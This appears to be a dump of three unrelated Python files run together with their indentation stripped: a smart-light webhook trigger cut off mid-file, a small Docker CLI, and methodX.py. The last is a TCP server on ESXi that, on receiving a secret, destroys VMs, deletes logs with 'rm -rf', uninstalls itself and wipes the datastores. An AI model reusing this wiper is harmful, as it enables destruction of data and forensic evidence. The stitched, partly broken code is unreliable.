conf = load_json(CONFIG_FILE)
identity = conf[IP_ADDRESS].get('identity')
psk = conf[IP_ADDRESS].get('key')
api_factory = APIFactory(host=IP_ADDRESS, psk_id=identity, psk=psk)
# This section connects to the gateway and gets information on devices
api = api_factory.request
gateway = Gateway()
devices_command = gateway.get_devices()
devices_commands = api(devices_command)
devices = api(devices_commands)
# Create an array of objects that are lights
lights = [dev for dev in devices if dev.has_light_control]
def observe(api, device):
def callback(updated_device):
light = updated_device.light_control.lights[0]
if (light.state):
# Light has been switched on
print('Light on! Calling WebHook...')
req = urllib.request.Request(WEBHOOK, data)
urllib.request.urlopen(req)
else:
print('Light off')
def err_callback(err):
print(err)
def worker():
api(device.observe(callback, err_callback, duration=120))
threading.Thread(target=worker, daemon=True).start()
print('Sleeping to start observation task')
sleep(1)
observe(api, lights[0])
while(True):
sleep(0.01)
|
cli.py
|
''' CLI entry point for the knot '''
import os
import click
import threading
from knot import config
from knot.lib import detect_server
@click.group()
def main():
'''display help'''
@main.command()
def build():
'''executes predefined docker build command'''
os.chdir(config.project_path('..'))
ext = 'bat' if os.name == 'nt' else 'sh'
os.system(f'docker_build.{ext}')
@main.command()
def run():
'''executes predefined docker run command'''
os.chdir(config.project_path('..'))
thread = threading.Thread(target=detect_server, args=([5001],))
thread.start()
ext = 'bat' if os.name == 'nt' else 'sh'
os.system(f'docker_run.{ext}')
@main.command()
def start():
'''starts web ui'''
os.chdir(config.project_path('web'))
os.system('python app.py')
|
methodX.py
|
#!/usr/bin/env python
#-*- coding: utf-8 -*-
import sys
import esxi
import threading
import subprocess
import sms
from settings import Settings
from cleaner import cleanDiskSpace
from socketserver import *
import time
datastores = esxi.datastoresPath()
if len(datastores) > 0:
settings = Settings(datastores[0])
else:
raise Exception("Don't find datastore")
lock = threading.Lock()
class methodXServerHandler(StreamRequestHandler):
def handle(self):
self.data = self.request.recv(1024)
if lock.acquire(False):
try:
data = self.data.decode().replace("\r","").replace("\n","")
if data == settings.Secret:
self.request.sendall(b'Ok secret. Starting destroy VMs')
sms.send(settings.Phones)
handleVMs(destroyVM)
time.sleep(5)
subprocess.call(["rm", "-rf", "/scratch/vmware/../log/*"], stdout = subprocess.DEVNULL, stderr = subprocess.DEVNULL)
subprocess.call(["rm", "-rf", settings.Path], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
subprocess.call(["esxcli", "software", "vib", "remove", "-n", "methodX", "--no-live-install"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
threadList = []
for datastorePath in datastores:
thread = threading.Thread(target = cleanDiskSpace, args = (datastorePath + "/",))
threadList.append(thread)
thread.start()
for thread in threadList:
thread.join()
self.request.sendall(b'Done')
elif data == settings.TestSecret:
sms.send(settings.Phones)
handleVMs(shutdownVM)
self.request.sendall(b'Done')
elif data == "TestConnect":
self.request.sendall(b'Connect OK')
self.request.sendall(b'Done')
except Exception as e:
self.request.sendall(bytes(str(e), "utf-8"))
finally:
lock.release()
else:
self.request.sendall(b'Process already started ...')
def handleVMs(vmHandleFunc):
cluster = esxi.connect()
for ipAddress in settings.VMS:
vmDescription = esxi.getVmDescriprionByIp(cluster, ipAddress)
if vmDescription != None:
vmHandleFunc(vmDescription)
def destroyVM(vmDescription: dict):
if (vmDescription["poweredOn"]):
esxi.powerOff(vmDescription["vmId"])
time.sleep(1)
esxi.destroy(vmDescription["vmId"])
def shutdownVM(vmDescription: dict):
if (vmDescription["poweredOn"]):
esxi.shutdown(vmDescription["vmId"])
if __name__ == "__main__":
server = TCPServer(("0.0.0.0", settings.Port), methodXServerHandler)
try:
settings.Check()
server.serve_forever()
except Exception as e:
print("Error: %s" % e)
finally:
server.server_close()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.